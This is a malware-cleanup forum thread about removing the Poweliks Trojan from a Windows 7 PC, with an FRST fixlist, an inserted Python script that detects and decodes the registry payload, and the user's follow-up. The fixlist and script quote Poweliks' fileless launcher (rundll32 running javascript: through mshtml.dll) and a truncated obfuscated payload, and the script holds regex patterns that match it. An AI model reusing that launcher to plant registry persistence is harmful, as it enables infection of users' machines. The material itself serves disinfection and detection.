My system is a Dell Inspiron 580 running Windows 7 Pro SP1, 64-bit. I have followed the Avast forum instructions for generating the log files and have attached them to this post.
Some additional observations while generating the log files:
The Malwarebytes scan was long and sluggish with all of the network activity going on due to the malware. I eventually disconnected the network cable to the internet and the scan sped up. All remaining programs that generated log files were run without the computer connected to the internet. If this was in error for diagnosing the problem, please indicate.
On the first run of the aswMBR program, the computer blue-screened and indicated that a clock interrupt was not received on a secondary processor within the allocated time interval. After rebooting, the program ran correctly. It is not known whether this was a significant event. The log files for the event are available.
I would like to request that one of the experts out there create a fixlist for this issue. Thank you.
CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.
Open notepad and copy/paste the text in the quotebox below into it:
CreateRestorePoint:
HKU\S-1-5-21-981463533-1766717349-2643960564-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-981463533-1766717349-2643960564-1000 -> {743EE9B2-E508-407C-882E-D2BF1C613DDC} URL =
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File
Toolbar: HKU\S-1-5-21-981463533-1766717349-2643960564-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File
Toolbar: HKU\S-1-5-21-981463533-1766717349-2643960564-1000 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
CustomCLSID: HKU\S-1-5-21-981463533-1766717349-2643960564-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
EmptyTemp:
CMD: bitsadmin /reset /allusers
Save this as fixlist.txt, in the same location as FRST.exe.
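The two entries marked Poweliks in the fixlist above share one tell: a COM class's localserver32 value, which normally names the executable that implements the object, instead launches rundll32.exe with a javascript: URL that loads mshtml.dll and calls RunHTMLApplication, so the payload lives entirely in the registry. The script below is an added example, not part of this thread or of FRST, that scans FRST-style registry lines for that pattern and decodes the eval() string. The sample lines are constructed: the first reproduces the CustomCLSID entry from the fixlist verbatim, the other two are benign controls. The decoder assumes each character was shifted up by one code point, which is what the page's own string shows (it decodes to the start of a document.write call); that shift is an assumption checked against this sample only, not a general Poweliks decoder.

```python
import re
from typing import Dict, List

# Constructed sample input in FRST log style. The first line reproduces the
# CustomCLSID indicator from the fixlist above; the other two are constructed
# control lines that the scanner must not flag.
SAMPLE_LINES: List[str] = [
    r'CustomCLSID: HKU\S-1-5-21-981463533-1766717349-2643960564-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>',
    r'CustomCLSID: HKU\S-1-5-21-981463533-1766717349-2643960564-1000_Classes\CLSID\{11111111-2222-3333-4444-555555555555}\localserver32 -> C:\Program Files\Example\example.exe (constructed benign entry)',
    r'SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = ',
]

# A legitimate LocalServer32 value points at an executable. Poweliks instead
# makes rundll32 load mshtml.dll and run inline JavaScript, so the value
# itself is the indicator, independent of the obfuscated payload.
POWELIKS_LOCALSERVER = re.compile(
    r'\\localserver32\b.*\brundll32(?:\.exe)?\s+javascript:', re.IGNORECASE)
RUNHTA = re.compile(r'RunHTMLApplication', re.IGNORECASE)
EVAL_ARG = re.compile(r'eval\("([^"]*)')
CLSID = re.compile(r'\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}')


def deobfuscate(payload: str, shift: int = 1) -> str:
    """Undo a per-character code-point shift.

    The default shift of 1 is an assumption taken from the eval() string in
    the fixlist above, where it yields readable JavaScript; other samples may
    use a different scheme.
    """
    return ''.join(chr(ord(c) - shift) for c in payload)


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per line whose localserver32 value launches
    rundll32 with a javascript: URL, with the eval() argument decoded."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        if not POWELIKS_LOCALSERVER.search(line):
            continue
        clsid = CLSID.search(line)
        evl = EVAL_ARG.search(line)
        encoded = evl.group(1) if evl else None
        decoded = deobfuscate(encoded) if encoded is not None else None
        findings.append({
            'clsid': clsid.group(0) if clsid else None,
            'uses_run_html_application': bool(RUNHTA.search(line)),
            'encoded_payload': encoded,
            'decoded_payload': decoded,
            # A decoded prefix that reads as script confirms the shift guess
            # for this sample; a garbage prefix means the scheme differs.
            'decode_plausible': decoded is not None and 'document.' in decoded,
        })
    return findings


if __name__ == '__main__':
    for finding in scan(SAMPLE_LINES):
        for key, value in finding.items():
            print(f'{key}: {value}')
```

The detection keys on the launcher, not on the encoded string, because the payload changes between samples while the rundll32 + javascript: + mshtml.dll technique is what makes this persistence fileless. Running the same regex over an exported HKCU\Software\Classes\CLSID hive, rather than an FRST log, is a straightforward change of input.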
That certainly did the trick. Thank you very much. The fixlog file is attached. I have since come to know that this is actually the Poweliks Trojan. I have been using Windows 7 on this computer for a number of years without incident and this has shaken my confidence. Aside from Avast, I’ve never had to rely on other software such as Malwarebytes. I don’t go to outlandish websites and so must have picked this up through my normal browsing. Is this a vulnerability that Microsoft needs to address? I’m concerned I will pick this up again easily if steps aren’t taken to plug the hole.
By the way, I see posts from others with this who have had trouble downloading the software needed to provide you with the log files. I noticed this Trojan changes the IE security settings and prevents downloading files from websites. Certainly getting the files using another computer works, but if that is unavailable, I found that going into Internet Options, the Security tab, and selecting the Default level button sets things correctly long enough to get the files downloaded.
Interesting. Pretty much all of the trash email I get is funneled into a spam folder and never opened. I have received and opened bogus emails from friends who have had their accounts hacked, but I never open attachments or go to links that may be present. I was on the findagrave.com website when I noticed the increase in network activity begin to affect the computer performance from this Trojan. They have a lot of ads popping up at different times. I hope it’s not as easy as just going to a website that allows this to get in.
So far the computer is rock solid. I will give it a couple of days and report back if I see anything.
Thanks again. You guys perform a valuable service for the community at large. For that I am grateful.
Click on the link above to be taken to Unchecky.com
Click the very large Download button.
click Save
Click Open folder
Right click on the Unchecky_setup and choose to Run as Administrator
Once open click the Install button.
Then click on Finish
Unchecky is now installed and will help you keep unwanted check boxes unchecked; this is a fire-and-forget programme.
It is critical to have both a firewall and antivirus to protect your system, and to keep them updated.
To learn more about how to protect yourself while on the internet, read this little guide: Best security practices. Keep safe.
Whoa! I feel 10 pounds lighter. Everything is still good, but Delfix did some things I wasn’t expecting. In my user folder quite a lot got deleted. Aren’t folders like the AppData folder used by applications?
I see what it did now. It must have set the folder options in Windows Explorer to defaults. I usually like to see hidden files and folders and it had set them to not shown. Everything is there.
Cleanup completed. CryptoPrevent and Unchecky were installed as recommended.
This computer is running optimally. Thank you for your assistance with this issue. It is truly appreciated.